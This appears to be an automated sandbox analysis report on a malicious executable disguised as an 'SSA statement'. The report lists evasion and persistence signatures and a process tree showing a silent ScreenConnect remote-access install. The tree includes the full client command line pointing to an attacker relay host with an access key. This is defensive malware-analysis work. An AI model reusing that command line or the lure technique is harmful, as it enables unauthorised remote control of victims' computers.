Edit tour
Windows
Analysis Report
SSA-Statement283482.exe
Overview
General Information
Detection
ScreenConnect Tool
Score: | 63 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Compliance
Score: | 32 |
Range: | 0 - 100 |
Signatures
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Enables network access during safeboot for specific services
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Classification
- System is w10x64
- SSA-Statement283482.exe (PID: 5536 cmdline:
"C:\Users\ user\Deskt op\SSA-Sta tement2834 82.exe" MD5: 3947493098FA9F8AD99838B31B1718CA) - msiexec.exe (PID: 5980 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \ScreenCon nect\8139d 6693ff1137 7\setup.ms i" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 5164 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 4132 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 1770C73 D69AC35812 7C1D8A8340 504F8 C MD5: 9D09DC1EDA745A5F87553048E57620CF) - rundll32.exe (PID: 3360 cmdline:
rundll32.e xe "C:\Use rs\user\Ap pData\Loca l\Temp\MSI 6666.tmp", zzzzInvoke ManagedCus tomActionO utOfProc S fxCA_46138 43 1 Scree nConnect.I nstallerAc tions!Scre enConnect. ClientInst allerActio ns.FixupSe rviceArgum ents MD5: 889B99C52A60DD49227C5E485A016679) - msiexec.exe (PID: 6600 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng DB207B6 B05E5334A6 A4617F086F 0333F MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 5952 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 6F45938 9FAB8D805B 11F9DC9BBC EE18B E Gl obal\MSI00 00 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- ScreenConnect.ClientService.exe (PID: 2788 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (8139 d6693ff113 77)\Screen Connect.Cl ientServic e.exe" "?e =Access&y= Guest&h=in stance-uil 9h2-relay. screenconn ect.com&p= 443&s=2392 2f34-f56d- 42f0-ae76- f0d68b3867 65&k=BgIAA ACkAABSU0E xAAgAAAEAA QBtiFOcCyZ yZIYMRa7q% 2fxlupwY5p sgwtIrmaNt AqcPOS3wxM 8KzGEILcWi AQrulPKqVk 7Rqd6bB%2f HZh%2fmnGS w2CAH4apde V45uG24aPv 2cHFtSJ6Rs hGlIAVmQDp gDTZGV70NO KRVbQf4oTZ hjBjedMNc4 eQan%2fjh9 itC%2bqr9s xraG6l1Z%2 boKOxbfHBJ 6Wfpk7eUPM 6olxgYqoAm aN4Rv%2bfd TlaueMe6P2 zoVUESpDoH b1G6UbMs3F mBJCA%2f9A Zwydk%2f14 3G89rCDbAy abHRD4c4l% 2fHfxv8RMf l8ImXlPMvn bcvlou8OpE AIEdGjx8c% 2bAEWMGqks gH4Y5DFBuR 2ZkLk&c=Qu adChomes&c =QuadChome s.com&c=&c =Host&c=&c =&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447) - ScreenConnect.WindowsClient.exe (PID: 6196 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (8139 d6693ff113 77)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "db 1808b5-e64 7-4ee6-81c 0-2c66f5bc 4c39" "Use r" MD5: 20AB8141D958A58AADE5E78671A719BF)
- svchost.exe (PID: 2896 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
Click to see the 3 entries |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |